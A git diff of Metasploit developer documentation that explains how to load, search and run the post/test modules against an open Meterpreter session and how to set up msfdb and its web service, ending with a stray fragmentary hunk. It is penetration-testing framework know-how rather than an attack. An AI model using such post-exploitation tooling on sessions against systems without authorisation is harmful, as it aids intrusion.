+By default the test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:

 ```msf
 msf6 > loadpath test/modules
@@ -9,4 +13,69 @@ Loaded 38 modules:
 msf6 > 
 ```

-These modules are intended to be used by developers to test updates to ensure they don't break core functionality and should not be used during normal operations. If you do happen to break the functionality of one of these modules, it is highly recommended that you look at what you are proposing within your PR and ensure that you are not accidentally breaking unintended functionality. If you do need to break certain functionality in order to add a given feature, and there is no other way to go around this, be sure to let one of the Metasploit team members know this so that appropriate updates can be made to these scripts and any associated code that may be updated by your change (assuming it is has been signed off and approved by the team).
+The modules can be searched for:
+
+```msf
+msf6 > search post/test
+
+Matching Modules
+================
+
+   #   Name                               Disclosure Date  Rank    Check  Description
+   -   ----                               ---------------  ----    -----  -----------
+   0   post/test/cmd_exec                 .                normal  No     Meterpreter cmd_exec test
+   1   post/test/railgun                  .                normal  No     Railgun API Tests
+   2   post/test/extapi                   .                normal  No     Test Meterpreter ExtAPI Stuff
+   3   post/test/get_env                  .                normal  No     Test Post::Common Get Envs
+   4   post/test/services                 .                normal  No     Test Post::Windows::Services
+   5   post/test/all                      .                normal  No     Test all applicable post modules
+... etc etc ...
+```
+
+Example of running the test module against an opened session:
+
+```
+msf6 > use post/test/cmd_exec
+msf6 post(test/cmd_exec) > run session=-1
+...
+[*] Testing complete in 2.04 seconds
+[*] Passed: 6; Failed: 0; Skipped: 0
+[*] Post module execution completed
+```
+
+The `post/test/all` module is an aggregate module that can be used to quickly run all of the applicable test modules
+against a currently open session:
+
+```msf
+msf6 post(test/all) > run session=-1
+
+[*] Applicable modules:
+Valid modules for x86/windows session 1
+=======================================
+
+ #   Name                          is_session_platform  is_session_type
+ -   ----                          -------------------  ---------------
+ 0   test/railgun_reverse_lookups  Yes                  Yes
+ 1   test/search                   Yes                  Yes
+ 2   test/services                 Yes                  Yes
+ 3   test/meterpreter              Yes                  Yes
+ 4   test/cmd_exec                 Yes                  Yes
+ 5   test/extapi                   Yes                  Yes
+ 6   test/file                     Yes                  Yes
+ 7   test/get_env                  Yes                  Yes
+ 8   test/railgun                  Yes                  Yes
+ 9   test/registry                 Yes                  Yes
+ 10  test/unix                     No                   Yes
+ 11  test/mssql                    Yes                  No
+ 12  test/mysql                    Yes                  No
+ 13  test/postgres                 Yes                  No
+ 14  test/smb                      Yes                  No
+
+[*] Running test/cmd_exec against session -1
+[*] --------------------------------------------------------------------------------
+... etc etc ...
+
+[*] Running test/extapi against session -1
+[*] --------------------------------------------------------------------------------
+... etc etc ...
+```
@@ -29,7 +29,7 @@ All of the above features can also be logically separated within workspaces. By

 ## Using msfdb

-Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`.
+Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`
 ```
 Creating database at /Users/your_current_account_name/.msf4/db
 Starting database at /Users/your_current_account_name/.msf4/db...success
@@ -39,9 +39,14 @@ Starting database at /Users/your_current_account_name/.msf4/db...success
 Creating initial database schema
 ```

-This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information.
+This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information.  If you start up msfconsole now it should automatically connect to the database, and if you run `db_status` you should see something like this:

-msfdb then needs to establish the credentials that are used in the Web Service. The Web Service is how Metasploit connects to the database we have just created. The first prompt asks you what username you want to use to connect to the database.
+```
+msf6 > db_status
+[*] Connected to msf. Connection type: postgresql.
+```
+
+You can also setup a Web Service, which Metasploit can use to connect to the database you have just created.  Msfdb needs to establish the credentials that are used in the Web Service. If you run `msfdb --component webservice init` the first prompt asks you what username you want to use to connect to the database:

 ```
 [?] Initial MSF web service account username? [your_current_account_name]:
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .0.5
 .2.5